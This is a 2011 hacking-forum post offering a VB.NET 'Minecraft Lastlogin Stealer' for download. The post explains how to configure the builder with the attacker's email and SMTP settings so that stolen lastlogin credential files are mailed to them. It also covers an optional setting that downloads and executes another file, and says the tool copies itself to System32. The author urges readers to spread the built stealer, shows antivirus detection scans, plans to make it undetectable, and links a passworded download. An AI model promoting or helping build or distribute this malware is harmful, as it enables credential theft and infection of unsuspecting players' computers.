Minecraft Lastlogin Stealer {SD8Z}
(v1.1)
(v1.1)
Hello there people, I just joined this forum and well I like to code VB.NET, this is just something that steals a victim's Minecraft lastlogin file, which is where their username and password are, they are encrypted by the way, you can use some other programs to decrypt them.
Click here for a tutorial on how to decrypt them.
So, how does this works exactly?
First you will make your server with the builder:
Theme by AeonHacks from HF
You type in an email, this is the email where the stolen files will be sent. This email will be used for sending the emails too.
In the password box, you type the email's password.
In SMTP/Port box, you type in that format the SMTP and Port of the email - example: smtp.gmail.com/587
Where "smtp.gmail.com" is the SMTP and "587" is the port.
File Download: this is optional, if you would like the server to download and execute a file, put the download link there: NOTE: the link must be direct.
Then you just build your server and spread it.
So now that someone has opened your server, it will look if the lastlogin file exists, if not, it will close. If it exists, then it will proceed and send the email.
After the email is sent it will close and move to a System32. I just choosed that folder randomly.
How an email will look like:
Click here for a tutorial on how to decrypt the username and password in the lastlogin file.
Virus Scans:
File Info
Report date: 2011-10-08 05:21:12 (GMT 1)
File name: minecraft-stealer-exe
File size: 929792 bytes
MD5 Hash: 601cca71ef3c3aabe650dba0d0f23ddc
SHA1 Hash: 25f2bf406952563e95e558a234c763893adf72ab
Detection rate: 2 on 9 (22%)
Status: INFECTED
Detections
Avast -
AVG -
Avira AntiVir -
ClamAV -
Comodo -
Emsisoft - Trojan.SuspectCRC!IK
F-Prot -
Ikarus - Trojan.SuspectCRC
TrendMicro -
Scan report generated by
NoVirusThanks.org
Report date: 2011-10-08 05:21:12 (GMT 1)
File name: minecraft-stealer-exe
File size: 929792 bytes
MD5 Hash: 601cca71ef3c3aabe650dba0d0f23ddc
SHA1 Hash: 25f2bf406952563e95e558a234c763893adf72ab
Detection rate: 2 on 9 (22%)
Status: INFECTED
Detections
Avast -
AVG -
Avira AntiVir -
ClamAV -
Comodo -
Emsisoft - Trojan.SuspectCRC!IK
F-Prot -
Ikarus - Trojan.SuspectCRC
TrendMicro -
Scan report generated by
NoVirusThanks.org
File Info
Report date: 2011-10-08 05:21:58 (GMT 1)
File name: servermcstealer-exe
File size: 17960 bytes
MD5 Hash: 77d19c8ee63020c1deb692ffb390e7ac
SHA1 Hash: 802c6aaa8968f3859c8eb83b904c69b66d726468
Detection rate: 2 on 9 (22%)
Status: INFECTED
Detections
Avast -
AVG -
Avira AntiVir -
ClamAV -
Comodo -
Emsisoft - Trojan.SuspectCRC!IK
F-Prot -
Ikarus - Trojan.SuspectCRC
TrendMicro -
Scan report generated by
NoVirusThanks.org
I'll FUD this later, but I don't think that Ikarus and Emisoft are a problem, no one uses those antiviruses.
Download:
http://www.mediafire.com/?miuchldd9mggq5b
[Password: sd8z]
~~~~=~~~~=~~~~
Please leave your thoughts about this here! If you have any suggestion please post it here too.
Credits:
Judgement, AeonHacks (HF)